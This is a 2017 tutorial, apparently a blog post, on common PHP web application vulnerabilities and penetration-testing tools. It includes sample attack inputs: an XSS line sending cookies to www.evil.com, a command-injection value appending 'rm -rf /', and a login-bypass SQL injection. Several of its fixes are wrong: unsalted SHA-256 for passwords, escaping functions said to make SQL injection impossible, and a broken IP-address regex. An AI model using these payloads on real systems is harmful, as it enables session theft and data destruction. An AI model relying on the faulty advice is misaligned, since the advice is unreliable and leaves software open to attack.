Complete Understanding of Web Application Security – 2017

1. Vulnerabilities

There are many types of attack vectors a malicious user might use to exploit a web application and when dealing with a large web site, it is often impossible to secure all possible vulnerabilities prior to publishing it on the Internet. The primary key to creating a secure web server is to understand what vulnerabilities exist, how to prevent them, and to follow development with a prolonged security audit.

The following vulnerabilities are some of the most common exploitation’s a PHP web developer may face and are very helpful to keep in mind while developing a web site.

a) DDoS (Distributed Denial of Service)

Exploitation: While a regular DoS (Denial of Service) attack is categorized as any attack that prevents any user from accessing authorized content, a DDoS attack is when a server is servicing too many requests at once and crashes. This can be by consuming all available bandwidth or by overloading the processor and memory on the server. These types of attacks, in some instances, can result in more serious vulnerabilities, like bypassing authentication or logging services by making them unavailable.

A similar attack to a traditional DDoS is a “Slowloris” attack. This is where a user assumes a given web server has a limited number of connections it may have open at any given time. By testing for how long the web server will keep a connection open before timing out, a malicious user can send many, fragmented requests that are sent just prior to a timeout occurs. This forces the web server to keep connections open for as long as possible, and not allowing it to service other, legitimate users because all available connections are filled.

Prevention: The best way to prevent the flooding of a web server is to limit the amount of processing time required to return a response to the user. An example of this is to step through a set of logical steps that determine if a request should or could be fulfilled and if it fails any of the test, do not perform any sort of external or resource-intensive operation. By filtering out bad requests early, the web server will conserve resources.

The only way to prevent slowloris attacks is to limit the amount of connections a given user may make at one time, minimize the allowable timeout delay and maximize the amount of open connections a server may handle. Much of this is dependent on the resources of the server, but if a malicious user is detected, a system administrator may contact their ISP and have their traffic blocked.

b) Brute Force

Exploitation: Brute forcing a web application is the practice of trying many different combinations of usernames and passwords in order to authenticated access to a restricted service. This technique is commonly conducted using a dictionary attack, which means the attacker uses a list of common passwords and tries each one on a given username.

A recent study was conducted on a recently compromised web service called Gawker. A researcher brute forced the 50 most common hashes in their user database and published a statistical analysis on his findings. What he found was that these 50 passwords made up about 5% of all the passwords in the database, meaning that with only 1000 attempts, a user will most likely compromise an account. Given a normal benchmark for brute forcing a remote web server is 500 requests a second, it would take approximately 2 seconds to gain authorized access to a typical web server.

Brute forcing can also be used to break one-way-encryptions such as MD5 or SHA-256. By using lookup tables, dictionaries or every possible combination of acceptable input, the user can match the outputted hashes against the hash they are trying to break. If they match, then the user has suitable input to authenticate with. It is possible, while brute forcing, to recreate the same hash with a different input then what made the original hash. This is because a hash only has x^y possible outputs, where “x” is the number of unique characters that can be outputted and “y” is the total number of digits in the hash. For example if a hash only outputs the numbers 0-9 and is 5 digits long, there are only 10^5 possible hashes and limitless possible inputs.

If a hash is local to a malicious user, a normal, home computer can perform nearly 2 million brute force attempts a second. This will compromise every possible 7 digit or less password in under a day. Because of this limitation, the entropy of the hash and the input is very important. Currently, the best practice is to use either SHA-256 or SHA-512 along with a password over 8 digits long.

Prevention: There are a number of techniques that can be used to stem brute force attacks on a web application. The most common one is to require a user to pass a “Captcha Test,” where the user has to retype the text in an obfuscated image. However, optical readers can be developed that will recognize characters and pass captcha tests with high degrees of success. Because of this, unique captchas need to be used and they need to be changed often, in order to maintain a high level of security.

A similar method of stemming automated brute force attacks is to use a simple question and answer test. This test will ask something that any human would know, for instance “What color is snow?” and match the input to a predefined answer. This is becoming more and more prevalent around the Internet but requires a large database of questions, so a malicious user cannot enumerate each possible question and answer.

What seems to be most effective is to have a timer that will lock out users if too many requests are made. While this is effective at not allowing unauthorized entry, it does create some false positives by locking out legitimate users. This also requires more computation time by the server, since date comparison and session lookups require more effort to resolve, so it leaves the server more vulnerable to DDoS attacks.

c) File Upload

Exploitation: A file upload vulnerability results from the failure to parse acceptable input and to store it in an externally accessible location. Most commonly, a specially crafted PHP file is uploaded onto the server and is subsequently executed by making an HTTP request. These PHP “Shells” can be combined with exploitation frameworks such as Metasploit to create a more easily exploitable vulnerability. By using Metasploit’s meterpreter files, a user can execute commands on the server with the same privileges the HTTP server has. Additional malicious files can be uploaded to allow for greater levels of exploitation.

These files can be other Metasploit modules which can create privilege escalation, or permanent back doors on the system. Through a meterpreter shell, a user can include the server’s database credentials file and begin making arbitrary SQL commands to the server to alter, copy or delete records in the database. The user also gains the capability of altering the website and either deface it or begin exploiting the users who access it.

Prevention: The best way to prevent a file upload vulnerability is to limit the types of files a user is allowed to upload to a server. If the function is designed to allow only images up to the server, a user would not be able to upload an executable file in it’s place, simply because when an image file is accessed on the server it is not executed but displayed.

Another method, which should be used in addition to the previous method, is to store uploaded files in a non-externally-accessible location, below the root web directory. This ensures that even if a malicious file was uploaded to a web server, that it could never be executed by a HTTP request. This method may be the only way to defend against a file upload attack because it may be an executable file that needs to be submitted.

d) Command Injection

Exploitation: Command injection is an attack vector which manipulates an existing command a web server makes to the operating system in order to perform a different action on the remote machine. It does this by appending a malicious command to an innocuous one. For instance, a web server may have an interface for running the ping command on the operating system, and if the user is suppose to only enter an IP address. However, if this can be exploited by entering “127.0.0.1 & rm -rf /“, which will tell the operating system two different commands. The first would be to ping it’s loop-back address and the second is to remove everything in the root directory of the hard drive.

Prevention: It is normally not a good idea to have an outward facing interface which performs an operating system command directly however, it is sometime necessary to do this if the scope of the web application extends beyond normal limits. In this case, there needs to be extra testing on this function to ensure that there is no way to trick the application into performing multiple operations instead of just the one.

In a Linux environment, some of the special characters would be “; | & > <” however, this can change from operating system to operating system so it is crucial to test this functionality on multiple systems. The best way to sanitize the input would be to define what acceptable input might look like and craft a regular expression to match it.

For a pinging application, the acceptable input would be an IP address or a domain name so to properly sanitize the input a regular expressions like ^(\d{1,3}[.]){4}$ and ^(w{3}[.])?[\w.]{1,}$, where the first matches an IP address and the second matches a domain. Neither of these expressions would allow branching from the original functionality and should be suitable safeguards against command injection attacks.

e) SQL Injection

Exploitation: SQL Injection is the exploitation of a SQL database in order to manipulate either the results from a query or the actual data that is stored in the database. This is one of the most common exploitation’s throughout the Internet simply because nearly every dynamic website uses a database, and there are often many interfaces to it throughout an application. The repercussions of not sanitizing input against possible SQL injection vulnerabilities can be severe, because it can allow users to perform any operation a database can, including: reading operating system files, executing operating system commands, and manipulating or deleting data.

The classic SQL injection is to type ‘ or 1=1;– into a user login field. Ideally this injection would be appended to the SQL statement:

SELECT * FROM users WHERE user = ‘<input>’ AND password = ‘<input>’;

Where this injection would result in the following statement being passed to the database server:

SELECT * FROM users WHERE user = ” or 1=1;–‘ AND password = ”;

By altering the where clause to look for users with a zero-length name or having 1=1 evaluate to true, and commenting out the rest of the statement, the entire clause would evaluate to true for each row. This means that every row in the database would be returned, more than likely resulting in the malicious user being authenticated to the web site.

These injections can become more sophisticated and include UNION clauses, which would allow a user to alter what information is reflected back to them in the DOM. Some injections would allow whole tables to be displayed to the users, while others can manipulate specific information in tables or truncate entire databases.

Prevention: Prevention of SQL injection attacks is a simple task, but can be easily overlooked during development. In a PHP script, any input that is going into a database should first be passed through two functions: stripslashes and mysqli_real_escape_string. If done in this order, then any input should be automatically sanitized and safe for interacting with a database, rendering the attack impossible.

On smaller websites, that do not need to be optimized, developers sometimes favor a single include at the top of a script, which passes every variable in the request super-global through these two functions and reassigns the returned values back to the super-global variable. This ensures that all data is sanitized by the time they are used, but it can sometimes cause problems, where equality operations may not function in the intended way, because the sanitized version may have extra or non-existing slashes.

f) XSS (Cross Site Scripting)

Exploitation: Contrary to many web application vulnerabilities, cross site scripting is an attack against other users, and not the server itself. This attack vector is only exploitable when a web application reflects user input back to the user and does not sanitize for HTML or JavaScript. If a user is able to insert JavaScript into a web page, then that user can manipulate the DOM anyway they want. One of the most serious attacks is to manipulate the webpage to display a user login form that submits the data back to a malicious web server which stores the data for later use.

However, one of the most common attacks is to steal a user’s session ID. This session ID is stored in a user’s cookies and submitted to the web page every time it makes a request and if this ID is compromised and loaded into another web browser, then as far as the web server can tell, that other web browser is making requests as you as well. An example of a XSS injection would be this:

<script>document.location=”www.evil.com/?id=” + document.cookie</script>

This redirects the user to an evil web server and passes their entire cookie in a GET request.

Prevention: Defending a cross site scripting attack is a simple task, but can often be overlooked because of how often user input is reflected back to the user. And if the XSS vulnerability is not a “stored” attack, meaning the XSS is not stored in a database, but is “reflected”, meaning it is only exploitable by clicking on a specially crafted URL, it can be a long time before the web administrators discover the vulnerability exists.

In order to prevent against this, any output from a PHP script should be passed through the htmlspecialchars function. This strips out any special HTML characters the string might have and encodes them in a safe format.

2. Exploitation Tools

While there is no substitute for testing each input manually on a web server, there are tools that attempts to automate the process. They are not perfect because web sites vary so much in their implementation that it is not easy to account for each scenario therefore, they often miss exploitable vulnerabilities. There are many different tools out there for specialized tasks but the following list is a set of some of the most common and useful tools out there.

a) Fireforce

Fireforce is a FireFox plugin that attempts to brute force user login fields. The user simply gives a string that is displayed only on a failure, and then either selects a dictionary attack or a set of characters and try every combination.

b) SQL Map

SQL Map attempts to exploit SQL injection vulnerabilities, and when a reproducible attack vector presents itself, it will attempt to enumerate all the databases, tables and columns it can. After enumeration, it will present the user with a command prompt for them to entire SQL commands against.

c) Metasploit

Metasploit is an enterprise-backed, open source, exploitation framework which does much more than just web applications. It specializes in giving the user a shell on a remote system through a wide range of vulnerabilities. It has great support with various vulnerability scanners and can completely automate the exploitation process. In terms of web applications, it has the ability to load specialized PHP scripts through upload vulnerabilities and provide the user with a shell to send operating system commands through.

3. Vulnerability Scanners

While exploitation tools, such as Metasploit, are primarily used to demonstrate the effects of not securing a potential attack vector, vulnerability scanners take a less pro-active approach and simply report any abnormal behavior form a web server, when potentially malicious input is sent to it. Just like the exploitation tools, scanners will not be able to discover every vulnerability and it is crucial that a manual test is performed to ensure an acceptable level of security.

a) Nessus

Nessus is an open source tool that will scan physical systems for known vulnerabilities. If a system, running an uncofigured version of XAMPP, were scanned by Nessus, it would identify multiple vulnerabilities including default FTP passwords, as well as insecure cryptography practices in it’s standard implementation of SSL/TLS.

b) w3af

W3af is a vulnerability framework developed by OWASP, an organization widely recognized as the expert source of web application security information. W3af has a wide range of embedded scripts that will scan for audit compliance as well as traditional vulnerabilities.

4. Proxies

A web proxy is a service that acts as an intermediary between a client and a server and are often used to capture information on how the client and the server communicate. When they are used for security audits, they can be used to manipulate HTTP requests after client-side JavaScript validation. This makes JavaScript validation efforts ineffective and only useful for creating a better user experience and reducing the traffic going to the server.

a) BeEF

BeEF is a cross site scripting framework proxy, in that it accepts redirects from XSS vulnerable websites and responds to the original client with a manipulated version of the response the requested web-server. BeEF often acts as a key logger by injecting JavaScript into the DOM of vulnerable web servers.

b) Tamper Data

Tamper data is a Firefox plugin that intercepts any requests the web browser makes and allows the user to manipulate the request. This is often used as a very simple method of bypassing client-side validation as well as a way of manipulating request headers, such as user-agents and locations.

5. Live Systems

There are a number of live distributions of Linux which act as an entire platform for web penetration testing. These systems can either be installed as a primary operating system, or as a virtual machine that can be run inside of another operating system.

a)Backtrack

Backtrack is the de facto standard framework for penetration testing. It is an Ubuntu operating system with over 300 tools installed on it. Web application testing is only just a small part of what Backtrack is capable of but it is a tool that anyone who is serious about security should be familiar with.

b) DVWA (Damn Vulnerable Web Application)

DVWA is a web server, built on an Ubuntu operating system that is an example of what web developers should and should not do. It contains web pages that are vulnerable to just about every type of web application attack and also includes resources and code samples of how to prevent them. It is a fantastic tool to learn how to secure a web server.

6. Summary

There are very limited circumstances that can result in the development of a truly secure web application. Many times developers are forced to use 3rd party frameworks, either because of time or compatibility constraints and at that point, the developer is at the mercy of the security of these external frameworks. However, the most effective way to secure a system is to understand the exploits that can arise from using insecure practices and, throughout development, perform security audits and testing.

This testing should be done with both automated tools and by manually conventions, because there is often a chain of exploits required to perform a harmful function to a system. And it’s because of this, it is often too difficult for scanners to discover all of the possible vulnerabilities in a system. When developing, design a suite of security functions that is used throughout the code, because if security is implemented with custom functions within each class, then it creates many points of failure and can cause problems with maintenance and testing. If a vulnerability is discovered when all the security is done in one place, then it makes for only one, simple change to secure your system, contrary to having to update all of the security code that can be scattered throughout the system.

You may also like:

Sarcastic Writer

Step by step hacking tutorials about wireless cracking, kali linux, metasploit, ethical hacking, seo tips and tricks, malware analysis and scanning.

Related Posts